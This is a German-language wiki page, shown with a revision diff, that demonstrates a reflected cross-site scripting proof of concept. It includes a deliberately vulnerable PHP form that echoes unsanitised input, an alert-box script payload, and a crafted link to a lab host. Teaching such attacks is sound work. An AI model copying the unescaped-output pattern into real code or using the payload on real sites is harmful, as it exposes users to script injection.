Cross-Site-Scripting Proof of Concept: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 29: Zeile 29:
 
=Payload=
 
=Payload=
 
  <script>alert("xinux hack")</script>
 
  <script>alert("xinux hack")</script>
 +
=Daraus resultierender Link=
 +
*http://opfer.secure.local/xss.php?msg=+%3Cscript%3Ealert%28%22xinux+hack%22%29%3C%2Fscript%3E&submit=klick
 +
 
=Ergebnis=
 
=Ergebnis=
 
[[Datei:Xinux-hack.png]]
 
[[Datei:Xinux-hack.png]]

Version vom 27. Juli 2021, 18:08 Uhr

Script

<?php
  if(isset($_POST['submit'])){
    $msg = $_POST['msg'];
  }
?>

<!DOCTYPE html>
<html>
        <body>
                <h2>Authentifizierung</h2>
                <form method="post">
                  <label for="fname">Input</label><br>
                  <input type="text" name="msg"><br>
                  <input type="submit" name="submit" value="klick">
                </form>


                <br>
<?php
echo "Hello $msg";
?>
                </table>
        </body>
</html>

Payload

<script>alert("xinux hack")</script>

Daraus resultierender Link

Ergebnis

Xinux-hack.png

Abgerufen von „http://wiki.ixheim.de/index.php?title=Cross-Site-Scripting_Proof_of_Concept&oldid=26214